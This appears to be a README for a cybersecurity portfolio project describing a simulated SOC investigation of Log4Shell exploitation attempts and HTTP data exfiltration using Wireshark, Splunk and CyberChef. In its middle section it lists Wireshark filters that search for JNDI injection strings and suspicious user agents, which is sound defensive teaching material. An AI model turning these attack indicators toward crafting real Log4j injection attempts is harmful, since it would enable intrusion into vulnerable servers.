This project demonstrates SOC-level log analysis and investigation skills using a simulated environment.
The focus is on detecting, investigating, and documenting two common attacker techniques involving HTTP traffic.
- Log4j vulnerability exploitation (Log4Shell)
- Data exfiltration over HTTP
All analysis was performed using anonymized training data adapted from SOC lab exercises.
👉 The completed SIEM Log Analysis Report can be downloaded via my cybersecurity blog, Happy Bytes
This repository contains cybersecurity learning exercises and defensive security analysis. The materials document investigations, threat hunting, or incident response scenarios for educational and portfolio purposes.
No malware, exploits, or offensive tooling are distributed in this repository. Any IP addresses, indicators, or artifacts are included strictly for analysis and educational demonstration.
- Wireshark
- Splunk
- CyberChef
- HTTP & network protocol analysis
Objective:
Identify exploitation attempts targeting Log4j via malicious HTTP requests.
Key Techniques:
- Inspection of HTTP headers and payloads
- Detection of JNDI injection patterns
- Decoding obfuscated strings using CyberChef
Within Wireshark, we can use common search parameters to narrow our search, including:
- http.request.method == "POST"
- (ip contains "jndi") or (ip contains "Exploit")
- (frame contains "jndi") or ( frame contains "Exploit")
- (http.user_agent contains "$") or (http.user_agent contains "==")
- Image 1: Using these parameters, we identified a potentially suspicious packet within Wireshark. Investigating the HTTP stream of this packet, we identified the start of a "Log4j" attack phase. CyberChef was then used to decode and transform the obfuscated payload.
Objective:
Detect and analyze suspicious outbound HTTP traffic indicating possible data exfiltration.
Key Techniques:
- Packet-level inspection in Wireshark
- Event correlation and timeline analysis in Splunk
- Identification of abnormal request frequency and payload size
- Image 1: Using Splunk, we could isolate a POST request with a large payload (600+ bytes, in this example) for further investigation.
- Image 2: To correlate the findings, we successfully isolated the suspicious packet in Wireshark, and followed the HTTP stream to identify the exposed credentials and data being exfiltrated to the external IP.
👉 The completed SIEM Log Analysis Report can be downloaded via my cybersecurity blog, Happy Bytes
- Viewable on GitHub: SIEM Log Analysis Report (PDF)
- Detection queries
- Anonymized sample logs
- SIEM log analysis
- Network traffic investigation
- Threat detection & triage
- Incident documentation
- SOC-style remediation recommendations
Data used in this project is derived from simulated SOC lab environments and re-analyzed independently for educational and portfolio purposes.
Feel free to connect on LinkedIn or review my other security projects.
Feedback and discussion are welcome. Thank you for reviewing this project. 🙏